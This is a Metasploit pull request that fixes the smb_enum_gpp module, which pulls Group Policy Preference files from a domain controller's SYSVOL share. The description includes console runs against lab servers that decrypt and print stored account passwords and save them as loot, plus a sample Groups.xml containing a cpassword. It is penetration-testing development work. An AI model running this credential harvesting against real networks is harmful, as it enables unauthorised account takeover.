### PR TITLE
Fix smb enum gpp module

### DIFF
--- a/documentation/modules/auxiliary/scanner/smb/smb_enum_gpp.md
+++ b/documentation/modules/auxiliary/scanner/smb/smb_enum_gpp.md
@@ -6,7 +6,7 @@ key. This module has been tested successfully on a Win2k8 R2 Domain Controller.
 
 ### Test Environment
 
-This vulnerability was patched in 2014 but Group Policy Prefence files can still be found in modern environments. Because of that it is
+This vulnerability was patched in 2014 but Group Policy Preference files can still be found in modern environments. Because of that it is
 necessary to have a means to test this vulnerability in a contrived way.
 
 Starting from a Windows Server that has been configured as an Active Directory Domain Controller:

--- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb
+++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
   def check_path(ip, path)
     vprint_status("Trying to download \\\\#{ip}\\#{path}...")
     begin
-      fd = simple.open("\\#{path}", 'ro')
+      fd = simple.open(path, 'ro')
       print_good "Found Policy Share on #{ip}"
       smb_download(ip, fd, path)
     rescue ::RubySMB::Error::UnexpectedStatusCode => e
@@ -66,7 +66,9 @@ class MetasploitModule < Msf::Auxiliary
       when 'STATUS_INSUFF_SERVER_RESOURCES'
         vprint_error("Host rejected with insufficient resources!")
       when 'STATUS_OBJECT_NAME_INVALID'
-        vprint_error("opening \\#{path} bad filename")
+        vprint_error("opening #{path.inspect} bad filename")
+      else
+        vprint_error("Server responded unexpected status code: #{e.status_code.name.inspect}")
       end
     ensure
       fd.close unless fd.nil?


### PR DESCRIPTION
### Before

gpp files are not found:

```
msf6 auxiliary(scanner/smb/smb_enum_gpp) > run smbuser=administrator smbpass=pass rhosts=winserv2019 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2

[*] 192.168.123.15:445    - Connecting to the server...
[*] 192.168.123.15:445    - Mounting the remote share \\192.168.123.15\SYSVOL'...
[*] winserv2019:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enum_gpp) 
```

### After

gpp files are found:
```
msf6 auxiliary(scanner/smb/smb_enum_gpp) > run smbuser=administrator smbpass=pass rhosts=winserv2019 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2

[*] 192.168.123.15:445    - Connecting to the server...
[*] 192.168.123.15:445    - Mounting the remote share \\192.168.123.15\SYSVOL'...
[+] 192.168.123.15:445    - Found Policy Share on 192.168.123.15
[*] 192.168.123.15:445    - Parsing file: \\192.168.123.15\SYSVOL\domain.local\Policies\{9D790A18-2FE6-48FD-BEB6-0075545DBB97}\MACHINE\Preferences\Groups\Groups.xml
[+] 192.168.123.15:445    - Group Policy Credential Info
============================

 Name               Value
 ----               -----
 TYPE               Groups.xml
 USERNAME           test
 PASSWORD           Super!!!Password
 DOMAIN CONTROLLER  192.168.123.15
 DOMAIN             domain.local
 CHANGED            2021-08-17 20:17:22
 NEVER_EXPIRES?     0
 DISABLED           0

[+] 192.168.123.15:445    - XML file saved to: /Users/adfoster/.msf4/loot/20210818152019_default_192.168.123.15_microsoft.window_907929.txt
[+] 192.168.123.15:445    - Groups.xml saved as: /Users/adfoster/.msf4/loot/20210818152020_default_192.168.123.15_smb.shares.file_033207.xml
[*] winserv2019:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## Verification

Ensure there's a file:
```
C:\Windows\SYSVOL\sysvol\adf2.local\Policies\{9D790A18-2FE6-48FD-BEB6-0075545DBB97}\Machine\Preferences\Groups\Groups.xml
```

With the contents:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" uid="{D9C14092-69B5-4ED5-8466-6D9644660ECC}" changed="2021-08-17 20:17:22" image="2" name="test">
<Properties userName="test" acctDisabled="0" neverExpires="0" noChange="0" changeLogon="1" cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3" description="test user" fullName="testing" newName="" action="U"/>
</User>
</Groups>
```

Set the module options and run the module. I have verified against server 2019 and 2012 (first release) successfully.

## Note

This module still doesn't work with 2012 r2 with smb2/3:

```
msf6 auxiliary(scanner/smb/smb_enum_gpp) > rerun rhosts=winserv2012r2 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2 
[*] Reloading module...

[*] 192.168.123.13:445    - Connecting to the server...
[*] 192.168.123.13:445    - Mounting the remote share \\192.168.123.13\SYSVOL'...
[-] 192.168.123.13:445    - 192.168.123.13: RubySMB::Error::CommunicationError An error occurred reading from the Socket Connection reset by peer
[*] winserv2012:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

But works against 2012 r2 with smb1:
```
msf6 auxiliary(scanner/smb/smb_enum_gpp) > rerun rhosts=winserv2012 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
[*] Reloading module...

[*] 192.168.123.13:445    - Connecting to the server...
[*] 192.168.123.13:445    - Mounting the remote share \\192.168.123.13\SYSVOL'...
[+] 192.168.123.13:445    - Found Policy Share on 192.168.123.13
[*] 192.168.123.13:445    - Parsing file: \\192.168.123.13\SYSVOL\domain.locall\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Preferences\Groups\Groups.xml
[+] 192.168.123.13:445    - Group Policy Credential Info
============================

 Name               Value
 ----               -----
 TYPE               Groups.xml
 USERNAME           basic_user
 PASSWORD           Super!!!Password
 DOMAIN CONTROLLER  192.168.123.13
 DOMAIN             domain.local
 CHANGED            2021-08-17 21:23:54
 NEVER_EXPIRES?     0
 DISABLED           0

[+] 192.168.123.13:445    - XML file saved to: /Users/user/.msf4/loot/20210818110829_default_192.168.123.13_microsoft.window_119742.txt
[+] 192.168.123.13:445    - Groups.xml saved as: /Users/user/.msf4/loot/20210818110829_default_192.168.123.13_smb.shares.file_916029.xml
[*] winserv2012:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

This is due to the `tree.list` call in the enum module; but shouldn't be a blocker to this PR as the code fix is later in the call stack.